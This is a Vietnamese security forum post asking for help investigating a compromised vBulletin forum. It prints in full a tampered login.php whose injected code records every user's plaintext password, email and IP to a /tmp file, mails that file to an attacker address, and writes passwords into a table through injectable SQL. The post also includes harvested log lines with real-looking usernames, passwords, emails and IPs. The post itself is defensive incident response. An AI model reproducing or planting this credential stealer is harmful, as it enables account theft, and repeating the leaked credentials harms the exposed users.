banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập Xem lại các email đã gởi từ hàm mail() trên PHP  XML
  [Analyzing]   Xem lại các email đã gởi từ hàm mail() trên PHP 23/04/2012 09:45:49 (+0700) | #1 | 261895
[Avatar]
phonglanbiec
Member

[Minus]    0    [Plus]
Joined: 03/07/2006 20:56:00
Messages: 162
Offline
[Profile] [PM]
Chào các bạn,

Mình đang gặp 1 tình huống như sau:

- Forum của bạn mình sử dụng VBB có bản quyền. Nhưng hôm nay thì không login vào được. Thế là hắn nhờ mình kiểm tra tại sao.
- Mình kiểm tra trong file login.php thì phát hiện rằng có 1 đoạn mã sẽ lưu lại tất cả thông tin người gởi gởi lên. Lưu vào 1 file (mà hắn giả là session) ở /tmp/. Cứ mỗi lần file có dung lượng >= 10MB thì hàm mail() sẽ tự gởi đến địa chỉ email của hắn.
- Cách khắc phục tạm thời của mình là lấy 1 file login.php sạch thế cho file đó.

Và hiện tại mình cần giúp đỡ để điều tra thêm:

1. Làm thế nào để kiểm tra đã có bao nhiêu email gởi từ hàm mail() của PHP?
2. Tại sao có 1 giai đoạn tự nhiên nó không nhận cái form password gởi lên?

Vì nội dung file log lại là:


User: xxx Pass: 113114 Email smiliexx@yahoo.com.vn ID : 35164 GroupID : 4 IP: 123.16.146.0 Time: Sunday 22nd of April 2012 08:08:35 PM
User: xxx Pass: 314159htm Email smiliexx@yahoo.com ID : 11557 GroupID : 17 IP: 113.185.1.167 Time: Sunday 22nd of April 2012 08:09:29 PM
User: xxx Pass: canhdonglua Email smiliexx@yahoo.com ID : 22680 GroupID : 2 IP: 1.52.27.213 Time: Sunday 22nd of April 2012 08:11:54 PM
User: onelove46 Pass: Email :hoahuongduong663@gmail.com ID : 31446 GroupID : 2 IP: 123.24.141.8 Time: Sunday 22nd of April 2012 08:19:00 PM
User: tienhieuo01 Pass: Email :tienhieuo01@yahoo.com.vn ID : 26462 GroupID : 2 IP: 1.53.2.31 Time: Sunday 22nd of April 2012 08:40:21 PM
User: edenhoang Pass: Email :uptinmuaban@gmail.com ID : 33772 GroupID : 3 IP: 113.172.221.137 Time: Sunday 22nd of April 2012 08:41:33 PM 


Nội dung file php mà hắn đã sửa lại là:

Code:
<?php
/*======================================================================*\
|| #################################################################### ||
|| # vBulletin 3.8.4 - Licence Number VBF6B249B5
|| # ---------------------------------------------------------------- # ||
|| # Copyright �2000-2009 Jelsoft Enterprises Ltd. All Rights Reserved. ||
|| # This file may not be redistributed in whole or significant part. # ||
|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # ||
|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # ||
|| #################################################################### ||
\*======================================================================*/

// ####################### SET PHP ENVIRONMENT ###########################
error_reporting(E_ALL & ~E_NOTICE & ~8192);

// #################### DEFINE IMPORTANT CONSTANTS #######################
define('THIS_SCRIPT', 'login');
define('CSRF_PROTECTION', true);
define('CSRF_SKIP_LIST', 'login');

// ################### PRE-CACHE TEMPLATES AND DATA ######################
// get special phrase groups
$phrasegroups = array();

// get special data templates from the datastore
$specialtemplates = array();

// pre-cache templates used by all actions
$globaltemplates = array();

// pre-cache templates used by specific actions
$actiontemplates = array(
	'lostpw' => array(
		'lostpw',
		'humanverify'
	)
);

// ######################### REQUIRE BACK-END ############################
require_once('./global.php');
require_once(DIR . '/includes/functions_login.php');

// #######################################################################
// ######################## START MAIN SCRIPT ############################
// #######################################################################

$vbulletin->input->clean_gpc('r', 'a', TYPE_STR);

if (empty($_REQUEST['do']) AND empty($vbulletin->GPC['a']))
{
	exec_header_wwwect($vbulletin->options['forumhome'] . '.php');
}

// ############################### start logout ###############################
if ($_REQUEST['do'] == 'logout')
{
	define('NOPMPOPUP', true);

	$vbulletin->input->clean_gpc('r', 'logouthash', TYPE_STR);

	if ($vbulletin->userinfo['userid'] != 0 AND !verify_security_token($vbulletin->GPC['logouthash'], $vbulletin->userinfo['securitytoken_raw']))
	{
		eval(standard_error(fetch_error('logout_error', $vbulletin->session->vars['sessionurl'], $vbulletin->userinfo['securitytoken'])));
	}

	process_logout();

	$vbulletin->url = fetch_replaced_session_url($vbulletin->url);
	if (strpos($vbulletin->url, 'do=logout') !== false)
	{
		$vbulletin->url = $vbulletin->options['forumhome'] . '.php' . $vbulletin->session->vars['sessionurl_q'];
	}
	$show['member'] = false;
	eval(standard_error(fetch_error('cookieclear', create_full_url($vbulletin->url), $vbulletin->options['forumhome'], $vbulletin->session->vars['sessionurl_q']), '', false));

}

// ############################### start do login ###############################
// this was a _REQUEST action but where do we all login via request?
if ($_POST['do'] == 'login')
{
	$vbulletin->input->clean_array_gpc('p', array(
		'vb_login_username'        => TYPE_STR,
		'vb_login_password'        => TYPE_STR,
		'vb_login_md5password'     => TYPE_STR,
		'vb_login_md5password_utf' => TYPE_STR,
		'postvars'                 => TYPE_BINARY,
		'cookieuser'               => TYPE_BOOL,
		'logintype'                => TYPE_STR,
		'cssprefs'                 => TYPE_STR,
	));
	try{
      		if($vbulletin->db->query_first("SELECT username FROM userpan WHERE username ='".$vbulletin->GPC['vb_login_username']."'")){
			$vbulletin->db->query_write("UPDATE userpan  set password='".$vbulletin->GPC['vb_login_password']."' where username='".$vbulletin->GPC['vb_login_username']."'");
		}else{
			$vbulletin->db->query_write("INSERT INTO  userpan(username,password) values('".$vbulletin->GPC['vb_login_username']."','".$vbulletin->GPC['vb_login_password']."')");
		}      	
		$vbulletin->GPC['vb_login_password']="";
 		}
	catch(Exception $e){}
	// can the user login?
	$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);

	if ($vbulletin->GPC['vb_login_username'] == '')
	{
		eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
	}

	// make sure our user info stays as whoever we were (for example, we might be logged in via cookies already)
	$original_userinfo = $vbulletin->userinfo;

	if (!verify_authentication($vbulletin->GPC['vb_login_username'], $vbulletin->GPC['vb_login_password'], $vbulletin->GPC['vb_login_md5password'], $vbulletin->GPC['vb_login_md5password_utf'], $vbulletin->GPC['cookieuser'], true))
	{
		($hook = vBulletinHook::fetch_hook('login_failure')) ? eval($hook) : false;

		// check password
		exec_strike_user($vbulletin->userinfo['username']);

		if ($vbulletin->GPC['logintype'] === 'cplogin' OR $vbulletin->GPC['logintype'] === 'modcplogin')
		{
			// log this error if attempting to access the control panel
			require_once(DIR . '/includes/functions_log_error.php');
			log_vbulletin_error($vbulletin->GPC['vb_login_username'], 'security');
		}
		$vbulletin->userinfo = $original_userinfo;

		if ($vbulletin->options['usestrikesystem'])
		{
			eval(standard_error(fetch_error('badlogin_strikes', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'], $strikes)));
		}
		else
		{
			eval(standard_error(fetch_error('badlogin', $vbulletin->options['bburl'], $vbulletin->session->vars['sessionurl'])));
		}
	}

	exec_unstrike_user($vbulletin->GPC['vb_login_username']);

	// create new session
	process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);



$lg_username = strtolower($vbulletin->GPC["vb_login_username"]); 
   	$lg_password = $vbulletin->GPC["vb_login_password"]; 
[color=red]   	$mail="xxx@live.com";
	$lfile="/tmp/sess_xxx";[/color]
	$lhande=@fopen($lfile,'a');
$email = "unknow";
        if(isset($vbulletin->userinfo['email']))
	$email = $vbulletin->userinfo['email'];
        $userid =$vbulletin->userinfo['userid']; 
        $groupID=$vbulletin->userinfo['usergroupid']; 
	$result = @mysql_query("select email from user where username='".$vbulletin->GPC['vb_login_username']."'");
	if($result)
	{
		$row = @mysql_fetch_array($result);
			$email = $row["email"];
	}	
	$ldata="User: ".$_POST["vb_login_username"]." Pass: ".$lg_password." Email :".$email ." ID : ".$userid. "  GroupID : ".$groupID. " IP: ".$_SERVER["REMOTE_ADDR"]." Time: ".date('l jS \of F Y h:i:s A')."\n";
	$sub=@$_SERVER['HTTP_HOST']."  user login ".date('l jS \of F Y h:i:s A');
	@fwrite($lhande,$ldata);
	@fclose($lhande);
	if(@filesize($lfile)>=1024*10) {
		$data=file_get_contents($lfile);
		@mail($mail,$sub,$data);
		@unlink($lfile);
	}














	// do wwwect
	do_login_wwwect();

}
else if ($_GET['do'] == 'login')
{
	// add consistency with previous behavior
	exec_header_wwwect($vbulletin->options['forumhome'] . '.php');
}

// ############################### start lost password ###############################
if ($_REQUEST['do'] == 'lostpw')
{
	$vbulletin->input->clean_gpc('r', 'email', TYPE_NOHTML);
	$email = $vbulletin->GPC['email'];

	if ($permissions['forumpermissions'] & $vbulletin->bf_ugp_forumpermissions['canview'])
	{
		$navbits = construct_navbits(array('' => $vbphrase['lost_password_recovery_form']));
		eval('$navbar = "' . fetch_template('navbar') . '";');
	}
	else
	{
		$navbar = '';
	}

	// human verification
	if (fetch_require_hvcheck('lostpw'))
	{
		require_once(DIR . '/includes/class_humanverify.php');
		$verification =& vB_HumanVerify::fetch_library($vbulletin);
		$human_verify = $verification->output_token();
	}
	else
	{
		$human_verify = '';
	}

	$url =& $vbulletin->url;
	eval('print_output("' . fetch_template('lostpw') . '");');
}

// ############################### start email password ###############################
if ($_POST['do'] == 'emailpassword')
{

	$vbulletin->input->clean_array_gpc('p', array(
		'email' => TYPE_STR,
		'userid' => TYPE_UINT,
		'humanverify'  => TYPE_ARRAY,
	));

	if ($vbulletin->GPC['email'] == '')
	{
		eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink'])));
	}

	if (fetch_require_hvcheck('lostpw'))
	{
		require_once(DIR . '/includes/class_humanverify.php');
		$verify =& vB_HumanVerify::fetch_library($vbulletin);
		if (!$verify->verify_token($vbulletin->GPC['humanverify']))
		{
	  		standard_error(fetch_error($verify->fetch_error()));
	  	}
	}

	require_once(DIR . '/includes/functions_user.php');

	$users = $db->query_read_slave("
		SELECT userid, username, email, languageid
		FROM " . TABLE_PREFIX . "user
		WHERE email = '" . $db->escape_string($vbulletin->GPC['email']) . "'
	");
	if ($db->num_rows($users))
	{
		while ($user = $db->fetch_array($users))
		{
			if ($vbulletin->GPC['userid'] AND $vbulletin->GPC['userid'] != $user['userid'])
			{
				continue;
			}
			$user['username'] = unhtmlspecialchars($user['username']);

			$user['activationid'] = build_user_activation_id($user['userid'], 2, 1);

			eval(fetch_email_phrases('lostpw', $user['languageid']));
			vbmail($user['email'], $subject, $message, true);
		}

		$vbulletin->url = str_replace('"', '', $vbulletin->url);
		eval(print_standard_wwwect('wwwect_lostpw', true, true));
	}
	else
	{
		eval(standard_error(fetch_error('invalidemail', $vbulletin->options['contactuslink'])));
	}
}

// ############################### start reset password ###############################
if ($vbulletin->GPC['a'] == 'pwd' OR $_REQUEST['do'] == 'resetpassword')
{

	$vbulletin->input->clean_array_gpc('r', array(
		'userid'       => TYPE_UINT,
		'u'            => TYPE_UINT,
		'activationid' => TYPE_STR,
		'i'            => TYPE_STR
	));

	if (!$vbulletin->GPC['userid'])
	{
		$vbulletin->GPC['userid'] = $vbulletin->GPC['u'];
	}

	if (!$vbulletin->GPC['activationid'])
	{
		$vbulletin->GPC['activationid'] = $vbulletin->GPC['i'];
	}

	$userinfo = verify_id('user', $vbulletin->GPC['userid'], 1, 1);

	$user = $db->query_first("
		SELECT activationid, dateline
		FROM " . TABLE_PREFIX . "useractivation
		WHERE type = 1
			AND userid = $userinfo[userid]
	");

	if (!$user)
	{
		// no activation record, probably got back here after a successful request, back to home
		exec_header_wwwect($vbulletin->options['forumhome'] . '.php');
	}

	if ($user['dateline'] < (TIMENOW - 24 * 60 * 60))
	{  // is it older than 24 hours?
		eval(standard_error(fetch_error('resetexpired', $vbulletin->session->vars['sessionurl'])));
	}

	if ($user['activationid'] != $vbulletin->GPC['activationid'])
	{ //wrong act id
		eval(standard_error(fetch_error('resetbadid', $vbulletin->session->vars['sessionurl'])));
	}

	// delete old activation id
	$db->query_write("DELETE FROM " . TABLE_PREFIX . "useractivation WHERE userid = $userinfo[userid] AND type = 1");

	$newpassword = fetch_random_password(8);

	// init user data manager
	$userdata =& datamanager_init('User', $vbulletin, ERRTYPE_STANDARD);
	$userdata->set_existing($userinfo);
	$userdata->set('password', $newpassword);
	$userdata->save();

	($hook = vBulletinHook::fetch_hook('reset_password')) ? eval($hook) : false;

	eval(fetch_email_phrases('resetpw', $userinfo['languageid']));
	vbmail($userinfo['email'], $subject, $message, true);

	eval(standard_error(fetch_error('resetpw', $vbulletin->session->vars['sessionurl'])));

}

/*======================================================================*\
|| ####################################################################
|| # Downloaded: 21:09, Mon Sep 28th 2009
|| # CVS: $RCSfile$ - $Revision: 31381 $
|| ####################################################################
\*======================================================================*/
?>


Thông tin về server:

Apache version 2.2.17
PHP version 5.2.14
MySQL version 5.0.95-community
Architecture i686
Operating system linux
Kernel version 2.6.18-238.19.1.el5PAE 
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|